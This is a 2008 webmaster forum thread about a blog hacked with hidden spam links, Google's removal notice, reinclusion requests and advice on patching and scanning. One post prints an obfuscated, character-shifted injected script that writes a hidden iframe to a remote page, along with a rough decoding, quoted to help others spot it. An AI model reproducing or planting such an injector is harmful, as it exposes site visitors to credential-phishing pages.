Welcome to WebmasterWorld Guest from 54.162.248.199

Message Too Old, No Replies

Hacked Blog and Hidden Links - warning email sent by Google

     
5:54 am on May 8, 2008 (gmt 0)

5+ Year Member



Got an email from Google that they have detected hidden links and have removed the site for 30 days and that I should file a reinclusion request.

Now the site is an authority site, long time number 1, with sitelinks in the serps.

The only affected area is the www.mysite.com/blog directory as that is where the hidden links are.

The blog part is now not showing in serps for site:www.mysite.com/blog but my main part of the site is ok and still number one.

I have filed a reinclusion request after having removed offending links from the header but had to select www.mysite.com as there was no option in webmaster tools to select www.mysite.com/blog.

Question. Should I be worried? I am not bothered about the blog part coming back as it is a minor part of the site anyway. Perhaps I should not have filed the request!

9:57 am on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Wow. I don't think I've ever heard Google actually doing this. You must be pretty important. Everyone else just disappears as Google assumes you did it yourself ... you wouldn't happen to be spending a lot of money on Adwords would you?
2:37 pm on May 8, 2008 (gmt 0)

5+ Year Member



I am not sure if Google sends emails to anyone about their websites -- that would be awesome customer service from any company. This email is probably a fake.
3:29 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member



I am not sure if Google sends emails to anyone about their websites -- that would be awesome customer service from any company. This email is probably a fake.

Google has been making an effort over the past year or two to notify webmasters when it finds problems. It isn't at the "awesome customer service" point yet but has been slowly and steadily expanding.

<added>
workingNOMAD, besides removing those hidden links did you apply any available security patches for the blog software you use? This might be an important point for reinclusion if applicable.
</added>

3:33 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member marcia is a WebmasterWorld Top Contributor of All Time 10+ Year Member



There's been some scuttlebutt going around lately about injection of hidden links into blog software via vulnerabilities. That isn't necessarily hacking in the usual sense we'd think of it, it's compromising sites using holes left out in the open, primarily with popular, open source software.

Scary, isn't it?

[edited by: Marcia at 3:39 pm (utc) on May 8, 2008]

4:35 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



In order for your Reconsideration request to get a positive result, it is very useful to let Google know more than a simple "I removed the parasite hidden links." If you fix the hole that was exploited on your server and include that fact in the request, you've done full due diligence on the issue. That step is often the deal-maker.
5:04 pm on May 8, 2008 (gmt 0)

5+ Year Member



I or my site are certainly not important!lol I wish!

I don't spent a cent on adwords but adsense does feature and has done since 2004.

I do feel a little honoured that Google did not ban the whole domain but just the blog part of the site. As I said before the blog part is not really important and I have been thinking of winding it down anyway.

The email is no fake and the blog has been dropped from the index as they said it would, pretty much within an hour of me reading the mail!

I have updated the security on the blog software too, thanks for the tip though. Just have to sit back and wait now!

5:10 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



From a few past experiences, warning emails aren't reserved for "important" websites. It's more often a help that Google extends to a webmaster who has no history of guideline problems.
6:06 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member bwnbwn is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Question was it done through webmaster section in your Google account?
Or did you get a personal email from Google were they had to take the time to find your email and send one to you or
was it a generic email from Google were the email can be harvested off the site?
6:07 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I think Google might have a person or two that regularly check website and send this emails. This is not the first time they are doing this, but they don't do that a lot.
I'm guessing they just are sort of trying to see whether this work or not.
6:14 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Out of interest, which software were you using for your blog?
6:24 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member marcia is a WebmasterWorld Top Contributor of All Time 10+ Year Member



>>which software

Could it have been this one?

[webmasterworld.com...]

6:41 pm on May 8, 2008 (gmt 0)

5+ Year Member



Yes it was that one, but I was running an even earlier version.

The email was sent to two email addresses, one was admin@domaininquestion.com but the interesting one was a free online email account I set up specifically for that website and is only shown in a jpeg format on the site to stop bots etc.

What I am saying is that is cannot have been an automated email.

By the way it came from 'Google Search Quality (noreply@google.com)'

7:05 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



> Scary, isn't it?

What's most scary, IMHO, is the fact that such holes exist in open source-software at all, and how uncritically people are using such frameworks on internet-servers with a highspeed backbone.

Sry, this is a bit OT and has nothing to do with google or their mail.

9:10 pm on May 8, 2008 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



The issue of the hacked blog - especially on Wordpress at the moment - is a major concern. Here's a related thread from the WebmasterWorld home page: Using WordPress 2.5 ? Upgrade immediately! [webmasterworld.com]

Blogs were supposed to be the "no-brainer" platform for the average non-tecchie to keep an online journal. Unfortunately as the various blogging platforms became widespread, the required level of brains and owner responsibility reached a higher level.

The web sharks smelled money and blogs became an irresistable target. First it was automated links in the comment areas (that brought us to the ugly rel=nofollow mutation) and now we're dealing with parasite hosting.

I'm glad to hear that Google is being helpful, as they can, but no one should depend on that. The issue is probably too widespread for them to email everyone they detect as being affected.

One interesting part of the report in the opening post is that Google did not remove entire domain from the index, only the blog directory. That kind of precision is quite welcome.

11:08 pm on May 8, 2008 (gmt 0)

5+ Year Member



Indeed that kind of precision is very welcome and suggests Google does perhaps care about smaller publishers.

By the way the blog in question is not the one on my profile.

12:01 am on May 9, 2008 (gmt 0)

10+ Year Member



Same thing happened to me. I have a popular authority site that dates back to 98 and they found hidden texts on old unused pages that were sitting on my server. They sent me the same e-mail and I started to go through the site to fix everything. Google actually put my site back in the serps with all the original top rankings exactly 30 days after I got that e-mail and even before I was done correcting everything (I hadn't even requested reinclusion yet). So if they think your site is a good site, you shouldn't have to worry. The only thing they did was to remove 1 point from my home page google pr, which didn't affect my traffic anyway.
3:43 am on May 9, 2008 (gmt 0)

WebmasterWorld Administrator anallawalla is a WebmasterWorld Top Contributor of All Time 10+ Year Member



No scuttlebutt. Recently I helped a WW member with a hacked WP (fairly old build). He got the same email from G but once he fixed the problem - just one page with about 100 links hidden behind display:none - Google reindexed (made visible) the site within a day or two.
1:31 pm on May 9, 2008 (gmt 0)

WebmasterWorld Senior Member billys is a WebmasterWorld Top Contributor of All Time 10+ Year Member



>>What's most scary, IMHO, is the fact that such holes exist in open source-software at all.

What's so scary? New vunerabilities are found all the time in both opensource and commercial software programs. The scary part for me is that webmasters ignore security warnings and don't upgrade their software.

My site has been hacked twice and both times it was directly attributed to me running a version that had known vunerabilites. That's what happened here too the OP simply ignored an aging portion of their site.

2:50 pm on May 9, 2008 (gmt 0)

WebmasterWorld Senior Member wheel is a WebmasterWorld Top Contributor of All Time 10+ Year Member



this is old-school Google at it's finest. Gratuitously helping out webmasters.

Off to update my wordpress installs!

3:06 am on May 10, 2008 (gmt 0)

WebmasterWorld Senior Member crobb305 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



Anyone have any tips on how to be proactive in looking for these hidden links? If your site gets hacked, how will you ever know these links are there?
3:36 am on May 10, 2008 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



Use a tool like Xenu Link Sleuth to monitor your site for external links. Think of it like getting a regular check-up. You will often catch other oversights and problems you weren't aware of, too.
7:31 am on May 10, 2008 (gmt 0)

5+ Year Member



One of the better ways to keep your system safe is to have it scanned on a regular basis.
Every now and then there is a new vulnerability discovered and there is no way for normal people to catch up on this.
Google up "vulnerability scanning system" and see the solutions available.
If your site is commercial and your are actually making money from your blog, I think it is important to keep it safe and be alerted when the industry knows about a new exploit.
10:59 am on May 11, 2008 (gmt 0)

5+ Year Member



I'm using a Vulnerability Scanning System and was notified couple of weeks ago that my wordpress is vulnerable and need to upgraded asap.
There are a few companies that provide this service, I think that most of them do the same. It is better to scan daily or weekly but not less tan that, since new exploits are dicovered all the time.
3:49 pm on May 14, 2008 (gmt 0)

5+ Year Member



I posted this on another thread related to data loss by Google Analytics however I think this is relevent to this discussion as well...

Recently my website was labled as as hosting badware. I have always ran a clean site and have advertised using the Google Adwords program for several years.
Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.

Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.

Here is the original code:

="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";

And here is what I translated it to:

script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – http://www.example.com.diamond.i.index/php.out - document - write – str – substring – 68-226 – str – substring – 1-68 – script

Heres where it gets interesting.

If you were to go to example.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.

I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.

It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.

I've asked Google if there has been a security breach and will update this thread once I receive a response.

[edited by: Robert_Charlton at 6:35 pm (utc) on May 14, 2008]
[edit reason] changed to example.com [/edit]

2:59 am on May 26, 2008 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



Matt Cutts made a very informative blog post today about the steps Google recently tried to take when they detected a hacked website.

We sent an email to [four different addresses at your domain] and a gmail.com address...with a subject line of “Removal from Google’s index.” I believe if you had logged into our webmaster console at google.com/webmasters and proved that you owned [the website], we also would have left a message waiting for you there as well.

[mattcutts.com...]

The post also contains an example of the kind of detailed information that Google sent - including a long list of the specific hidden text. Now THAT'S helpful.

Matt confirms that Google tries to reinstate hacked sites in a rapid fashion once the problem is fixed. From what he says, it does sound like a "hacked site" flag gets set and then needs to be removed manually, so Reconsideration Request sounds like an essential part of the process.

9:48 am on Jun 8, 2008 (gmt 0)

5+ Year Member



Ok, just thought I would give you an update about what happened to my blog.

Google said the site (blog) would be removed for 30 days. They were right, after 30 days the blog has reappeared, true to their word!

As I mentioned I contacted them to say it was the work of a spammer and I fixed the issue by upgrading the blog software.

The only other thing is that the main site, number one for so long, actually dropped to number three in the SERPS for the main keywords.

I am not sure if this is related to the blog part falling out but anyway traffic has not been affected!

A lesson learned.

9:56 am on Jun 8, 2008 (gmt 0)

5+ Year Member



This hack also affects the latest version of that widely used blog software. There are some interesting ongoing discussions elsewhere about how to fix the issue the sites that the hack redirects to. Yahoo or MSN it!
 

Featured Threads

Hot Threads This Week

Hot Threads This Month